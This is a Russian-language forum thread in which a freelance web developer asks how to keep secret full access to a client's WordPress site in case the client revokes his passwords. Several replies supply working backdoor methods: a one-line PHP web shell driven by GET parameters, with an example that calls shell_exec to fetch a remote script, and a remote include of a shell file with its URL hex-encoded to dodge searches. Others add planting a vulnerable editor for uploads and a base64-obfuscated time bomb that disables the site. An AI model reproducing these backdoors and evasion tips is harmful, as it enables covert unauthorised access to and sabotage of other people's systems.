Помощь Полный доступ к сайту

Skorp1oN · 1 Сен 2013

Версия WP: 3.6

Приветствую всех!
Очень нужна ваша помощь!
Столкнулся с неадекватным заказчиком... Делаю сайт на WP на хостинге заказчика. Чувствую что в любой момент можем разругаться (постоянно требует того что не было в ТЗ) и заказчик просто закроет доступ к сайту и сменит все пассы...

Необходимо как-то сделать возможность попадать в админку сайта, или иметь полный доступ и к фтп и БД сайта, независимо от того какие будут стоять пароли на фтп, админку и бд.

Залить бэкдор не вариант... Т.к. это как вирус и там админ сервака сразу удалит его и ситуация вообще станет хреновая...

В общем, я уже не знаю что делать... Очень нужна помощь, возможно можно в какой-то файл залить какой-то скрипт... Не знаю(((( Очень нужна помощь.

Заранее спасибо большое.

enrik · 1 Сен 2013

А если в любой .php файлик вписать $func($_GET[f]);, потом довольно просто будет или выполнить произволный php код или заинклудить shell.

<?=($_=@$_GET[c]).stripslashes(@$_($_GET[f]))?>

example:
GET /news.php?c=shell_exec&f=fetch%20http://bitrix.metrolux******.ru/upload/to.php

WiZXaK · 1 Сен 2013

Простой вариант: Для просмотра ссылки Войди или Зарегистрируйся (поиск и замена) - можно пароль выставлять и переименовывать файл (замаскировать под системный). Сможешь менять код CMS или удалить все к :pop:

на худой конец...

pavzen · 1 Сен 2013

Поставьте любой редактор с обнаруженными уязвимостями (ну например TinyMCE).
Через него сможете залить любой скрипт - хоть вебшелл.

Skorp1oN · 1 Сен 2013

WiZXaK написал(а):
Простой вариант: Для просмотра ссылки Войди или Зарегистрируйся (поиск и замена) - можно пароль выставлять и переименовывать файл (замаскировать под системный). Сможешь менять код CMS или удалить все к на худой конец...

Огонь вообще, то что надо) Спасибо огромное!
Я так понял, он же не считается как вирус?
А в логах потом будет видно что я заходил в этот файл? Ну если админ сервака посмотрит? Как не спалиться при редактировании?

Шумадан · 1 Сен 2013

у меня немного другой вопрос, если вы чувствуете, что заказчик неадекватен, то возможно лучше прекратить с заказчиком сотрудничество, чтоб избежать траты (на тот же шантаж типа вытру, удалю и так далее) времени в будущем, ведь если он не собирается (собирался) платить, он и не будет платить. может стоит провести черту, вот что было в тз сделано - пожалуйста оплатите. после оплаты пожалуйста сформируйте список изменениний. и так далее.

суть такая, если вы потратили много времени, что делать изменения к изменениям лучше остановиться сейчас и потребовать оплату, ну хотя бы 50%, чтоб не жалко было отказаться в любой момент, а так заказчик вас будет водить за нос вечность.

enrik · 1 Сен 2013

Для просмотра ссылки Войди или Зарегистрируйся чтот палевный вариант в acces.log будет видно кто куда лазал... а доступ (при правильном выставлении прав) в /var/log у пользователя не будет... Это будет одноразовый пшик. И вообще всё это будет палиться в логах (любой вэб шелл).

esche · 1 Сен 2013

Для просмотра ссылки Войди или Зарегистрируйся
на мой взгляд есть смысл притормозить все работы и обговорить завершение этапа (Что нужно доделать для завершения текущего этапа.. т.е. до следующей оплаты? Что из этого выходит за рамки ТЗ? Пройтись по пунктам, определить объём работ и закончить его.)

На будущее - (понятно, что пока своих шишек не набьешь..) есть смысл делать на своём сервере. Переносить только по результатам (естественно, если проект простой и времени на перенос уйдёт больше, чем стоит весь проект.. либо же доверие 100% /либо в других случаях по усмотрению/ можно делать на мощностях заказчика)

Всё, что "нахулиганишь" своим шеллом/бэкдором/скриптом замены восстановится из бэкапов без особых проблем (почти уверен, что в случае запланированного "кидка" резервную рабочую копию текущих файлов заказчик сделает).

По теме - можно includ-ить шелл (любой файл) по http (никаких eval или replace.. просто)

Код:

include 'http://myhost.ru/shell.txt';

- сделать в зависимости от наличия какого-нибудь условия (isset($_GET['hhh']))
- разбить http:// на части.. или использовать 16-ричные x00 символы (чтобы поиск по http:// ничего не дал)

Все замены в файлах - штука сомнительная. Часто у веб-сервера (php-скрипта) просто не хватает прав на изменение файлов, созданных по FTP

Скрытое содержимое доступно для зарегистрированных пользователей!

Skorp1oN · 1 Сен 2013

Шумадан написал(а):
у меня немного другой вопрос, если вы чувствуете, что заказчик неадекватен, то возможно лучше прекратить с заказчиком сотрудничество, чтоб избежать траты (на тот же шантаж типа вытру, удалю и так далее) времени в будущем, ведь если он не собирается (собирался) платить, он и не будет платить. может стоит провести черту, вот что было в тз сделано - пожалуйста оплатите. после оплаты пожалуйста сформируйте список изменениний. и так далее.

суть такая, если вы потратили много времени, что делать изменения к изменениям лучше остановиться сейчас и потребовать оплату, ну хотя бы 50%, чтоб не жалко было отказаться в любой момент, а так заказчик вас будет водить за нос вечность.

Нет здесь другая ситуация... Заключалось СБР, но заказчик во время заключения сделки, вставил совсем другое ТЗ (точнее тоже самое, но уже с внесенными изменениями, которые он сам туда вставил и мы не обсуждали вообще их) т.е. очень схитрил. Ну я первый раз встречаюсь с такой наглостью... Причем о дополнительных работах, я уже узнал после того как сделал большую часть работы и дизайн (за дизайн уже со своего кармана заплатил дизайнеру). В общем, человек оказался очень хитрым и наглым. Так что отказываться или что-то поделать уже не вариант. Но помимо этого, он еще меня начал напрягать другими моментами... Типа куча лишнего дизайна для других страниц и т.п. он считает что в стоимость уже включены все дизайны которые он захочет... В общем, это в кратце..

enrik написал(а):
Для просмотра ссылки Войди или Зарегистрируйся чтот палевный вариант в acces.log будет видно кто куда лазал... а доступ (при правильном выставлении прав) в /var/log у пользователя не будет... Это будет одноразовый пшик. И вообще всё это будет палиться в логах (любой вэб шелл).

А какой тогда есть еще вариант, чтобы не спалиться? Подскажите пожалуйста.

Nei · 1 Сен 2013

Я иногда ставлю простейшую защита по дате: если текущая дата больше установленной - перкращать выполнение скрипта. И, соответсветнно, раз в неделю к примеру эту дату вручную изменять. Как только доступа к серверу нет и проходит неделя - сайт вырубается.
Вставить этот код желательно в нескольких местах, где-то воткрытую, где-то в зашифрованном виде (base64 к примеру).

Вычистить такие вставки в принципе не сложно для разбирающегося человека, но зачастую хватает и этого.

P.S. Желаю все-таки по-человечески договориться с заказчиком и найти разумный компромисс.

Помощь Полный доступ к сайту

Skorp1oN

Мастер

enrik

Создатель

WiZXaK

Причиняю добро

pavzen

Создатель

Skorp1oN

Мастер

Шумадан

Хабарра!!11

enrik

Создатель

esche

Мой дом здесь!

Skorp1oN

Мастер

Nei

Nosce te ipsum